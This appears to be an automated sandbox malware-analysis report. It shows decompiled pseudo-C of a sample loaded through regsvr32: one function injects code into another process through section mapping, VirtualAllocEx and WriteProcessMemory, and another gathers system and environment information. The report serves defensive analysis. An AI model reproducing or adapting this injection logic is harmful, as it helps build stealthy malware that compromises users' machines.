12214->12223 12217 49f0320 lstrlenW 12216->12217 12220 49e94e7 12217->12220 12218 49e947d 12219 49f0320 lstrlenW 12218->12219 12219->12220 12221 49e8bf4 2 API calls 12220->12221 12221->12212 12222->12213 12224 49f3674 2 API calls 12223->12224 12225 49e8dd4 12224->12225 12226 49e8e01 12225->12226 12227 49f3674 2 API calls 12225->12227 12226->12218 12227->12225 12229 49ef160 12228->12229 12230 49e53da 12228->12230 12231 49e9dd8 2 API calls 12229->12231 12230->12075 12241 49e5021 12230->12241 12232 49ef16c 12231->12232 12233 49e9dd8 2 API calls 12232->12233 12234 49ef17b 12233->12234 12234->12230 12235 49ef188 GetModuleHandleA 12234->12235 12236 49ef19c 12235->12236 12237 49ef195 GetModuleHandleA 12235->12237 12238 49e8b9c 2 API calls 12236->12238 12237->12236 12239 49ef1a7 12238->12239 12240 49e8b9c 2 API calls 12239->12240 12240->12230 12242 49ec6ce 9 API calls 12241->12242 12243 49e5031 12242->12243 12244 49eb557 7 API calls 12243->12244 12245 49e503c 12244->12245 12353 49eb096 12245->12353 12247 49e5047 12247->12037 12247->12075 12358 49e8f8d 12248->12358 12250 49eafc5 12251 49eafcb 12250->12251 12252 49eaee1 6 API calls 12250->12252 12251->12047 12253 49eafd4 12252->12253 12253->12047 12255 49e50ee 12254->12255 12256 49e5123 12255->12256 12380 49e3097 12255->12380 12258 49ec6ce 9 API calls 12256->12258 12261 49e5188 12256->12261 12259 49e5133 12258->12259 12260 49ec4c1 6 API calls 12259->12260 12262 49e5143 12260->12262 12261->12050 12396 49e5072 12262->12396 12567 49ef236 12314->12567 12354 49eb0aa 12353->12354 12355 49eb0ba GetLastError 12354->12355 12356 49eb0b0 GetLastError 12354->12356 12357 49eb0c7 12355->12357 12356->12357 12357->12247 12378 49e8bde RtlAllocateHeap 12358->12378 12360 49e8fae 12361 49e8fbf lstrcpynW 12360->12361 12369 49e8fb8 12360->12369 12362 49e9032 12361->12362 12363 49e8fe2 12361->12363 12379 49e8bde RtlAllocateHeap 12362->12379 12365 49eb3c7 3 API calls 12363->12365 12366 49e8fee 12365->12366 12368 49e8e33 4 API calls 12366->12368 12371 49e9057 12366->12371 12367 49e903d 12367->12369 12367->12371 12372 49e8bf4 2 API calls 12367->12372 12370 49e9008 12368->12370 12369->12250 12370->12367 12376 49e900e 12370->12376 12373 49e8bf4 2 API calls 12371->12373 12375 49e907f 12371->12375 12372->12371 12373->12375 12374 49e8bf4 2 API calls 12374->12369 12375->12374 12377 49e8bf4 2 API calls 12376->12377 12377->12369 12378->12360 12379->12367 12381 49e30b3 12380->12381 12382 49e314b 12381->12382 12383 49e109a 2 API calls 12381->12383 12382->12256 12384 49e30c6 12383->12384 12385 49e9a5a 2 API calls 12384->12385 12386 49e30d8 12385->12386 12387 49e8baf 2 API calls 12386->12387 12388 49e30e3 12387->12388 12389 49e109a 2 API calls 12388->12389 12397 49e9930 2 API calls 12396->12397 12398 49e507d 12397->12398 12568 49ef26a 12567->12568 12570 49ef26e 12568->12570 12572 49e8bde RtlAllocateHeap 12568->12572 12573 49e4fa3 12568->12573 12572->12568 12699 49e8bde RtlAllocateHeap 12677->12699 12679 49e6702 12680 49e6873 12679->12680 12700 49e8bde RtlAllocateHeap 12679->12700 12680->11810 12682 49e671c 12682->12680 12683 49e6782 12682->12683 12687 49e8d6d memset 12682->12687 12688 49ebfdb 11 API calls 12682->12688 12684 49e8bf4 2 API calls 12683->12684 12685 49e6865 12684->12685 12686 49e8bf4 2 API calls 12685->12686 12686->12680 12687->12682 12688->12682 12701 49ea97b 12689->12701 12692 49e8bde RtlAllocateHeap 12692->11816 12694 49eade0 12693->12694 12695 49ea5d3 RtlAllocateHeap 12694->12695 12697 49eae08 12695->12697 12696 49eae6d 12696->11823 12697->12696 12698 49e8bf4 2 API calls 12697->12698 12698->12696 12699->12679 12700->12682 12702 49eab20 4 API calls 12701->12702 12703 49ea99a 12702->12703 12704 49ea978 12703->12704 12705 49e8bf4 2 API calls 12703->12705 12704->11814 12704->12692 12705->12704 12707 49ea96c 4 API calls 12706->12707 12708 49e5c2f 12707->12708 12741 49e5c65 12708->12741 12742 49eb297 12708->12742 12711 49eaa65 6 API calls 12712 49e5c55 12711->12712 12747 49ef53a 12712->12747 12720 49e5c7f 12775 49e14f2 CreateMutexW 12720->12775 12722 49e5c86 12790 49e34cc 12722->12790 12741->11463 12743 49ea065 GetSystemTimeAsFileTime 12742->12743 12744 49eb2a2 12743->12744 12745 49eaa36 6 API calls 12744->12745 12746 49e5c43 12745->12746 12746->12711 12748 49ef05c 8 API calls 12747->12748 12749 49ef54c 12748->12749 12750 49ef05c 8 API calls 12749->12750 12751 49ef565 12750->12751 12849 49ef4c9 12751->12849 12753 49e5c5c 12754 49e5baa 12753->12754 12755 49eb557 7 API calls 12754->12755 12756 49e5bc6 12755->12756 12756->12741 12757 49ea108 12756->12757 12758 49ea119 12757->12758 12759 49e5c6f 12758->12759 12863 49e8bde RtlAllocateHeap 12758->12863 12761 49ea205 12759->12761 12764 49ea223 12761->12764 12762 49ea27b 12763 49ea28c 12762->12763 12870 49e8bde RtlAllocateHeap 12762->12870 12766 49eb096 2 API calls 12763->12766 12771 49ea227 12763->12771 12764->12762 12764->12771 12864 49ea15b 12764->12864 12768 49ea2f1 12766->12768 12769 49ea32c 12768->12769 12770 49ea367 SetThreadPriority 12768->12770 12772 49ea350 12769->12772 12773 49e8bf4 2 API calls 12769->12773 12770->12771 12771->12720 12774 49e8d6d memset 12772->12774 12773->12772 12774->12771 12776 49e150b CreateMutexW 12775->12776 12786 49e1556 12775->12786 12777 49e151d 12776->12777 12776->12786 12778 49e1080 2 API calls 12777->12778 12779 49e1525 12778->12779 12780 49e9880 RtlAllocateHeap 12779->12780 12779->12786 12781 49e1535 12780->12781 12782 49e8b9c 2 API calls 12781->12782 12783 49e1542 12782->12783 12871 49e8bde RtlAllocateHeap 12783->12871 12785 49e154c 12785->12786 12872 49e8bde RtlAllocateHeap 12785->12872 12786->12722 12788 49e156d 12788->12786 12873 49e73f1 12788->12873 12791 49ea205 6 API calls 12790->12791 12792 49e34dc 12791->12792 12793 49e3501 12792->12793 12794 49e350f 12793->12794 12796 49e3514 12793->12796 12877 49ec987 12794->12877 12797 49e36aa 12796->12797 12798 49ed11f 8 API calls 12797->12798 12799 49e36c5 12798->12799 12804 49e36ce 12799->12804 12884 49e8bde RtlAllocateHeap 12799->12884 12801 49e36e2 12809 49e36ec 12801->12809 12885 49ecd02 12801->12885 12803 49e8bf4 2 API calls 12803->12804 12810 49e2e6b 12804->12810 12809->12803 12811 49ea96c 4 API calls 12810->12811 12812 49e2e81 12811->12812 12898 49e2db5 12812->12898 12815 49e2db5 3 API calls 12850 49ef4d7 12849->12850 12851 49ef513 12849->12851 12862 49e8bde RtlAllocateHeap 12850->12862 12853 49e9dd8 2 API calls 12851->12853 12854 49ef51d 12853->12854 12855 49e9880 RtlAllocateHeap 12854->12855 12856 49ef529 12855->12856 12857 49e8b9c 2 API calls 12856->12857 12858 49ef536 12857->12858 12858->12753 12859 49ef4e8 12859->12858 12860 49e8bf4 2 API calls 12859->12860 12861 49ef50c 12860->12861 12861->12753 12862->12859 12863->12759 12865 49ea165 12864->12865 12866 49ea18a 12865->12866 12867 49e8bf4 2 API calls 12865->12867 12869 49ea1a0 12865->12869 12868 49e8d6d memset 12866->12868 12867->12866 12868->12869 12869->12764 12870->12763 12871->12785 12872->12788 12874 49e73f6 12873->12874 12875 49ef05c 8 API calls 12874->12875 12876 49e7408 12875->12876 12876->12786 12878 49ec99e 12877->12878 12879 49ec9bd 12878->12879 12880 49e9df2 2 API calls 12878->12880 12879->12796 12881 49ec9cc lstrcmpiW 12880->12881 12882 49ec9e2 12881->12882 12883 49e8baf 2 API calls 12882->12883 12883->12879 12884->12801 12893 49ecb77 12885->12893 12894 49e8d6d memset 12893->12894 12895 49ecbae 12894->12895 12899 49e2dbf 12898->12899 12900 49e2dd6 12898->12900 12901 49e8c72 3 API calls 12899->12901 12900->12815 12901->12900 13042->11473 13043->11476 13670 49e26ec 13671 49e26fd 13670->13671 13676 49e2715 13670->13676 13678 49e7002 13671->13678 13675 49e9c2c 2 API calls 13677 49e272e 13675->13677 13701 49e26b3 13676->13701 13679 49e7024 13678->13679 13692 49e701c 13678->13692 13680 49ec307 2 API calls 13679->13680 13681 49e702d 13680->13681 13681->13692 13708 49f0e2d 13681->13708 13684 49e7047 13685 49e8bf4 2 API calls 13684->13685 13685->13692 13686 49e979d 7 API calls 13687 49e707a 13686->13687 13688 49e65f6 5 API calls 13687->13688 13687->13692 13689 49e708c 13688->13689 13690 49e7099 13689->13690 13693 49e70b1 13689->13693 13691 49e8bf4 2 API calls 13690->13691 13691->13692 13692->13676 13694 49e5e3c 8 API calls 13693->13694 13700 49e70d1 13693->13700 13698 49e70cd 13694->13698 13695 49e8bf4 2 API calls 13696 49e70fe 13695->13696 13697 49e8bf4 2 API calls 13696->13697 13697->13684 13699 49eaa65 6 API calls 13698->13699 13698->13700 13699->13700 13700->13695 13702 49ec307 2 API calls 13701->13702 13703 49e26c4 13702->13703 13704 49e26e8 13703->13704 13705 49e26db 13703->13705 13719 49eac2f 13703->13719 13704->13675 13707 49e8bf4 2 API calls 13705->13707 13707->13704 13709 49f0e3c 13708->13709 13710 49f0e78 13708->13710 13711 49e8bf4 2 API calls 13709->13711 13718 49e8bde RtlAllocateHeap 13710->13718 13713 49f0e45 13711->13713 13714 49e8c43 RtlAllocateHeap 13713->13714 13716 49e7041 13713->13716 13715 49f0e5c 13714->13715 13715->13716 13717 49efba1 lstrlenW 13715->13717 13716->13684 13716->13686 13717->13716 13718->13713 13720 49eac4b 6 API calls 13719->13720 13721 49eac46 13720->13721 13721->13705

                                                                                                                                                                        Executed Functions

                                                                                                                                                                        Function 049ED447 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 223nativeregistrymemoryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                        			E049ED447(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				short _v32;
				char _v36;
				intOrPtr* _v40;
				intOrPtr _v44;
				long _v48;
				void* _v52;
				void* _v53;
				char _v64;
				short _v68;
				struct _WNDCLASSEXA _v116;
				char _t81;
				intOrPtr* _t83;
				intOrPtr _t87;
				intOrPtr _t90;
				char _t97;
				short _t98;
				intOrPtr _t105;
				long _t107;
				char _t119;
				void* _t124;
				struct HWND__* _t132;
				void* _t138;
				void* _t147;
				void* _t154;
				intOrPtr _t155;
				intOrPtr _t157;
				void* _t158;
				void* _t163;
				void* _t165;

				_t81 =  *0x49ff81c; // 0x4befbe8
				_t138 = 0;
				_v12 = __ecx;
				_t157 = __edx;
				_v20 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				_v44 = __edx;
				if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
					E049EF0DE(0x1f4);
				}
				_t12 = _t157 + 0x3c; // 0x852c50ff
				_t83 =  *_t12 + _t157;
				_v28 = _t138;
				_v40 = _t83;
				if( *_t83 != 0x4550) {
					L14:
					_t158 = _v12;
					L15:
					if(_v8 != _t138) {
						_t90 =  *0x49ff918; // 0x4bef9f0
						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
						_v8 = _t138;
					}
					L17:
					if(_v16 != 0) {
						_t87 =  *0x49ff818; // 0x4bef8b0
						NtUnmapViewOfSection( *((intOrPtr*)(_t87 + 0x12c))(), _v16);
					}
					if(_v20 != 0) {
						NtClose(_v20);
					}
					return _v8;
				}
				_v52 =  *((intOrPtr*)(_t83 + 0x50));
				if(NtCreateSection( &_v20, 0xe, _t138,  &_v52, 0x40, 0x8000000, _t138) < 0) {
					goto L14;
				}
				_t97 =  *"18293"; // 0x39323831
				_v36 = _t97;
				_t98 =  *0x49fce44; // 0x33
				_v32 = _t98;
				_v116.lpszClassName =  &_v64;
				asm("movsd");
				_v116.lpfnWndProc = DefWindowProcW;
				_v116.cbWndExtra = _t138;
				asm("movsd");
				_v116.style = 0xb;
				_v116.lpszMenuName = _t138;
				_v116.cbSize = 0x30;
				asm("movsb");
				_v116.cbClsExtra = _t138;
				_v116.hInstance = _t138;
				if(RegisterClassExA( &_v116) != 0) {
					_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
					if(_t132 != 0) {
						DestroyWindow(_t132);
						UnregisterClassA( &_v64, _t138);
					}
				}
				_t105 =  *0x49ff818; // 0x4bef8b0
				_t107 = NtMapViewOfSection(_v20,  *((intOrPtr*)(_t105 + 0x12c))(),  &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40);
				_t158 = _v12;
				if(_t107 < 0 || NtMapViewOfSection(_v20, _t158,  &_v8, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40) < 0) {
					goto L15;
				} else {
					_t154 = E049E8C43( *0x49ff81c, 0x1ac4);
					_v36 = _t154;
					if(_t154 == 0) {
						goto L15;
					}
					 *((intOrPtr*)(_t154 + 0x224)) = _v8;
					_t163 = VirtualAllocEx(_t158, _t138, 0x1ac4, 0x1000, 4);
					WriteProcessMemory(_v12, _t163, _t154, 0x1ac4,  &_v28);
					E049E8BF4( &_v36, 0x1ac4);
					_t119 =  *0x49ff81c; // 0x4befbe8
					_t155 =  *0x49ff830; // 0x49e0000
					_v36 = _t119;
					 *0x49ff830 = _v8;
					 *0x49ff81c = _t163;
					E049E8CBB(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
					E049ED3C6(_v16, _v8, _v44);
					_t124 = E049EA43D("quatr");
					_v53 = _t138;
					_t147 = 0xf;
					if(_t124 > _t147) {
						do {
							L12:
							_t63 = _t138 + 0x41; // 0x41
							 *((char*)(_t165 + _t138 - 0x40)) = _t63;
							_t138 = _t138 + 1;
						} while (_t138 < _t147);
						L13:
						lstrlenW( &_v68);
						 *0x49ff830 = _t155;
						 *0x49ff81c = _v36;
						goto L17;
					}
					_t147 = _t124;
					if(_t147 == 0) {
						goto L13;
					}
					goto L12;
				}
			}






































                                                                                                                                                                        0x049ed44d
                                                                                                                                                                        0x049ed453
                                                                                                                                                                        0x049ed455
                                                                                                                                                                        0x049ed459
                                                                                                                                                                        0x049ed45b
                                                                                                                                                                        0x049ed45e
                                                                                                                                                                        0x049ed461
                                                                                                                                                                        0x049ed464
                                                                                                                                                                        0x049ed467
                                                                                                                                                                        0x049ed46a
                                                                                                                                                                        0x049ed475
                                                                                                                                                                        0x049ed478
                                                                                                                                                                        0x049ed47f
                                                                                                                                                                        0x049ed47f
                                                                                                                                                                        0x049ed484
                                                                                                                                                                        0x049ed487
                                                                                                                                                                        0x049ed489
                                                                                                                                                                        0x049ed48c
                                                                                                                                                                        0x049ed495
                                                                                                                                                                        0x049ed68e
                                                                                                                                                                        0x049ed68e
                                                                                                                                                                        0x049ed691
                                                                                                                                                                        0x049ed694
                                                                                                                                                                        0x049ed699
                                                                                                                                                                        0x049ed69f
                                                                                                                                                                        0x049ed6a2
                                                                                                                                                                        0x049ed6a2
                                                                                                                                                                        0x049ed6a5
                                                                                                                                                                        0x049ed6a9
                                                                                                                                                                        0x049ed6ab
                                                                                                                                                                        0x049ed6c0
                                                                                                                                                                        0x049ed6c0
                                                                                                                                                                        0x049ed6ca
                                                                                                                                                                        0x049ed6d4
                                                                                                                                                                        0x049ed6d4
                                                                                                                                                                        0x049ed6db
                                                                                                                                                                        0x049ed6db
                                                                                                                                                                        0x049ed4a4
                                                                                                                                                                        0x049ed4be
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ed4c4
                                                                                                                                                                        0x049ed4cc
                                                                                                                                                                        0x049ed4d4
                                                                                                                                                                        0x049ed4da
                                                                                                                                                                        0x049ed4e1
                                                                                                                                                                        0x049ed4e9
                                                                                                                                                                        0x049ed4ea
                                                                                                                                                                        0x049ed4f1
                                                                                                                                                                        0x049ed4f4
                                                                                                                                                                        0x049ed4f5
                                                                                                                                                                        0x049ed4fc
                                                                                                                                                                        0x049ed4ff
                                                                                                                                                                        0x049ed506
                                                                                                                                                                        0x049ed507
                                                                                                                                                                        0x049ed50a
                                                                                                                                                                        0x049ed516
                                                                                                                                                                        0x049ed538
                                                                                                                                                                        0x049ed540
                                                                                                                                                                        0x049ed543
                                                                                                                                                                        0x049ed54e
                                                                                                                                                                        0x049ed54e
                                                                                                                                                                        0x049ed540
                                                                                                                                                                        0x049ed56a
                                                                                                                                                                        0x049ed579
                                                                                                                                                                        0x049ed57c
                                                                                                                                                                        0x049ed581
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ed5ab
                                                                                                                                                                        0x049ed5bb
                                                                                                                                                                        0x049ed5bd
                                                                                                                                                                        0x049ed5c4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ed5d9
                                                                                                                                                                        0x049ed5ec
                                                                                                                                                                        0x049ed600
                                                                                                                                                                        0x049ed60c
                                                                                                                                                                        0x049ed611
                                                                                                                                                                        0x049ed616
                                                                                                                                                                        0x049ed61c
                                                                                                                                                                        0x049ed622
                                                                                                                                                                        0x049ed62a
                                                                                                                                                                        0x049ed63a
                                                                                                                                                                        0x049ed646
                                                                                                                                                                        0x049ed650
                                                                                                                                                                        0x049ed658
                                                                                                                                                                        0x049ed65d
                                                                                                                                                                        0x049ed660
                                                                                                                                                                        0x049ed668
                                                                                                                                                                        0x049ed668
                                                                                                                                                                        0x049ed668
                                                                                                                                                                        0x049ed66b
                                                                                                                                                                        0x049ed66f
                                                                                                                                                                        0x049ed670
                                                                                                                                                                        0x049ed674
                                                                                                                                                                        0x049ed678
                                                                                                                                                                        0x049ed681
                                                                                                                                                                        0x049ed687
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ed687
                                                                                                                                                                        0x049ed662
                                                                                                                                                                        0x049ed666
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ed666

                                                                                                                                                                        APIs
                                                                                                                                                                        • NtCreateSection.NTDLL(049ED982,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 049ED4B9
                                                                                                                                                                        • RegisterClassExA.USER32(?), ref: 049ED50D
                                                                                                                                                                        • CreateWindowExA.USER32 ref: 049ED538
                                                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 049ED543
                                                                                                                                                                        • UnregisterClassA.USER32 ref: 049ED54E
                                                                                                                                                                        • NtMapViewOfSection.NTDLL(049ED982,00000000), ref: 049ED579
                                                                                                                                                                        • NtMapViewOfSection.NTDLL(049ED982,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 049ED5A0
                                                                                                                                                                        • VirtualAllocEx.KERNELBASE(00000000,00000000,00001AC4,00001000,00000004), ref: 049ED5E6
                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00001AC4,?), ref: 049ED600
                                                                                                                                                                          • Part of subcall function 049E8BF4: HeapFree.KERNEL32(00000000,00000000), ref: 049E8C3A
                                                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,049E61C5), ref: 049ED678
                                                                                                                                                                        • NtUnmapViewOfSection.NTDLL(00000000), ref: 049ED6C0
                                                                                                                                                                        • NtClose.NTDLL(00000000), ref: 049ED6D4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Section$View$ClassCreateWindow$AllocCloseDestroyFreeHeapMemoryProcessRegisterUnmapUnregisterVirtualWritelstrlen
                                                                                                                                                                        • String ID: 0$18293$aeroflot$quatr
                                                                                                                                                                        • API String ID: 494031690-2640591812
                                                                                                                                                                        • Opcode ID: 5ab2aed8b99570b94f6076ad49b3497b83e91ce21dee827b3127d2bcb77545e9
                                                                                                                                                                        • Instruction ID: d64c203aee17315030ce59116f5d36abf31d405c25ada9d8d6ff8aa44ab815de
                                                                                                                                                                        • Opcode Fuzzy Hash: 5ab2aed8b99570b94f6076ad49b3497b83e91ce21dee827b3127d2bcb77545e9
                                                                                                                                                                        • Instruction Fuzzy Hash: 418118B5A00209EFDB11DF95D884EEEBBB8FB08704F14417AE605E7290D774AE45CBA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049EDF3D Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 250COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 79%
                                                                                                                                                                        			E049EDF3D(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v144;
				char _v656;
				char _v668;
				char _v2644;
				void* __esi;
				struct _OSVERSIONINFOA* _t68;
				intOrPtr _t70;
				void* _t71;
				intOrPtr _t73;
				void* _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t87;
				int _t90;
				intOrPtr _t92;
				void* _t93;
				void* _t97;
				intOrPtr _t99;
				intOrPtr _t101;
				short _t106;
				char _t108;
				intOrPtr _t113;
				intOrPtr _t116;
				intOrPtr _t119;
				intOrPtr _t123;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t138;
				intOrPtr _t141;
				intOrPtr _t143;
				intOrPtr _t148;
				void* _t149;
				WCHAR* _t150;
				char* _t151;
				intOrPtr _t162;
				intOrPtr _t177;
				void* _t191;
				struct _OSVERSIONINFOA* _t192;
				void* _t193;
				void* _t195;
				char _t198;
				void* _t199;
				char* _t200;
				void* _t203;
				int* _t204;
				void* _t216;

				_t216 = __fp0;
				_t148 =  *0x49ff830; // 0x49e0000
				_t68 = E049E8BDE(0x1ac4);
				_t192 = _t68;
				if(_t192 != 0) {
					 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId();
					_t70 =  *0x49ff818; // 0x4bef8b0
					_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
					_t3 = _t192 + 0x648; // 0x648
					E049F3548( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
					_t73 =  *0x49ff818; // 0x4bef8b0
					_t5 = _t192 + 0x1644; // 0x1644
					_t194 = _t5;
					_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
					_t207 = _t74;
					if(_t74 != 0) {
						 *((intOrPtr*)(_t192 + 0x1854)) = E049E95F3(_t194, _t207);
					}
					_t75 =  *0x49ff818; // 0x4bef8b0
					_t77 = E049EC879( *((intOrPtr*)(_t75 + 0x12c))()); // executed
					 *((intOrPtr*)(_t192 + 0x110)) = _t77;
					_t159 =  *_t77;
					if(E049EC9F4( *_t77) == 0) {
						_t79 = E049EC8C9(_t159, _t194); // executed
						__eflags = _t79;
						_t162 = (0 | _t79 > 0x00000000) + 1;
						__eflags = _t162;
						 *((intOrPtr*)(_t192 + 0x214)) = _t162;
					} else {
						 *((intOrPtr*)(_t192 + 0x214)) = 3;
					}
					_t14 = _t192 + 0x220; // 0x220, executed
					_t80 = E049EF3A3(_t14); // executed
					 *((intOrPtr*)(_t192 + 0x218)) = _t80;
					_t81 = E049EF368(_t14); // executed
					 *((intOrPtr*)(_t192 + 0x21c)) = _t81;
					_t17 = _t192 + 0x114; // 0x114
					_t195 = _t17;
					 *((intOrPtr*)(_t192 + 0x224)) = _t148;
					_push( &_v16);
					_v12 = 0x80;
					_push( &_v8);
					_v8 = 0x100;
					_push( &_v656);
					_push( &_v12);
					_push(_t195);
					_push( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x110)))));
					_t87 =  *0x49ff820; // 0x4befaa0
					_push(0); // executed
					if( *((intOrPtr*)(_t87 + 0x6c))() == 0) {
						GetLastError();
					}
					_t90 = GetSystemMetrics(0x1000);
					_t28 = _t192 + 0x228; // 0x228
					_t149 = _t28;
					 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000;
					E049EDF36(_t149); // executed
					_t211 = _t149;
					if(_t149 != 0) {
						 *((intOrPtr*)(_t192 + 0x434)) = E049E95F3(_t149, _t211);
					}
					_t92 = E049EC6CE();
					_t33 = _t192 + 0xb0; // 0xb0
					_t196 = _t33;
					 *((intOrPtr*)(_t192 + 0xac)) = _t92;
					_t93 = E049EC4C1(_t92, _t33, _t211, _t216);
					_t35 = _t192 + 0xd0; // 0xd0
					E049E99DF(_t93, _t33, _t35);
					_t36 = _t192 + 0x438; // 0x438
					E049E960D(_t149, _t36);
					_t97 = E049EE2C5(_t196, E049EA43D(_t33), 0);
					_t37 = _t192 + 0x100c; // 0x100c
					E049EC6E4(_t97, _t37, _t216);
					_t99 =  *0x49ff818; // 0x4bef8b0
					_t101 = E049ECA46( *((intOrPtr*)(_t99 + 0x12c))(_t195)); // executed
					 *((intOrPtr*)(_t192 + 0x101c)) = _t101;
					E049E8D6D(_t192, 0, 0x9c);
					_t204 = _t203 + 0xc;
					_t192->dwOSVersionInfoSize = 0x9c;
					GetVersionExA(_t192);
					 *((intOrPtr*)(_t192 + 0xa8)) = E049EDD39(_t100);
					_t106 = E049EDD62(_t105);
					_t41 = _t192 + 0x1020; // 0x1020
					_t150 = _t41;
					 *((short*)(_t192 + 0x9c)) = _t106;
					GetWindowsDirectoryW(_t150, 0x104);
					_t108 = E049E9DF2(_t105, 0x9cf);
					_t177 =  *0x49ff818; // 0x4bef8b0
					_t198 = _t108;
					 *_t204 = 0x104;
					_push( &_v668);
					_push(_t198);
					_v8 = _t198;
					if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
						_t143 =  *0x49ff818; // 0x4bef8b0
						 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
					}
					E049E8BAF( &_v8);
					_t113 =  *0x49ff818; // 0x4bef8b0
					_t48 = _t192 + 0x1434; // 0x1434
					_t199 = _t48;
					 *_t204 = 0x209;
					_push(_t199);
					_push(L"USERPROFILE");
					if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
						E049E9E51(_t199, 0x105, L"%s\\%s", _t150);
						_t141 =  *0x49ff818; // 0x4bef8b0
						_t204 =  &(_t204[5]);
						 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
					}
					_push(0x20a);
					_t51 = _t192 + 0x122a; // 0x122a
					_t151 = L"TEMP";
					_t116 =  *0x49ff818; // 0x4bef8b0
					_push(_t151);
					if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
						_t138 =  *0x49ff818; // 0x4bef8b0
						 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
					}
					_push(0x40);
					_t200 = L"SystemDrive";
					_push( &_v144);
					_t119 =  *0x49ff818; // 0x4bef8b0
					_push(_t200);
					if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
						_t136 =  *0x49ff818; // 0x4bef8b0
						 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
					}
					_v8 = 0x7f;
					_t59 = _t192 + 0x199c; // 0x199c
					_t123 =  *0x49ff818; // 0x4bef8b0
					 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
					_t62 = _t192 + 0x100c; // 0x100c
					E049F3548(E049EE2C5(_t62, E049EA43D(_t62), 0),  &_v2644);
					_t63 = _t192 + 0x1858; // 0x1858
					E049F351A( &_v2644, _t63, 0x20);
					_push( &_v2644);
					_push(0x1e);
					_t66 = _t192 + 0x1878; // 0x1878
					_t191 = 0x14;
					E049E96DA(_t66, _t191);
					_t134 = E049EDAE3(_t191); // executed
					 *((intOrPtr*)(_t192 + 0x1898)) = _t134;
					return _t192;
				}
				return _t68;
			}























































                                                                                                                                                                        0x049edf3d
                                                                                                                                                                        0x049edf47
                                                                                                                                                                        0x049edf53
                                                                                                                                                                        0x049edf58
                                                                                                                                                                        0x049edf5d
                                                                                                                                                                        0x049edf6a
                                                                                                                                                                        0x049edf70
                                                                                                                                                                        0x049edf75
                                                                                                                                                                        0x049edf7b
                                                                                                                                                                        0x049edf8b
                                                                                                                                                                        0x049edf90
                                                                                                                                                                        0x049edf95
                                                                                                                                                                        0x049edf95
                                                                                                                                                                        0x049edfa5
                                                                                                                                                                        0x049edfab
                                                                                                                                                                        0x049edfad
                                                                                                                                                                        0x049edfb6
                                                                                                                                                                        0x049edfb6
                                                                                                                                                                        0x049edfbc
                                                                                                                                                                        0x049edfc9
                                                                                                                                                                        0x049edfce
                                                                                                                                                                        0x049edfd4
                                                                                                                                                                        0x049edfdd
                                                                                                                                                                        0x049edfeb
                                                                                                                                                                        0x049edff2
                                                                                                                                                                        0x049edff7
                                                                                                                                                                        0x049edff7
                                                                                                                                                                        0x049edff8
                                                                                                                                                                        0x049edfdf
                                                                                                                                                                        0x049edfdf
                                                                                                                                                                        0x049edfdf
                                                                                                                                                                        0x049edffe
                                                                                                                                                                        0x049ee004
                                                                                                                                                                        0x049ee009
                                                                                                                                                                        0x049ee00f
                                                                                                                                                                        0x049ee014
                                                                                                                                                                        0x049ee01a
                                                                                                                                                                        0x049ee01a
                                                                                                                                                                        0x049ee023
                                                                                                                                                                        0x049ee029
                                                                                                                                                                        0x049ee02d
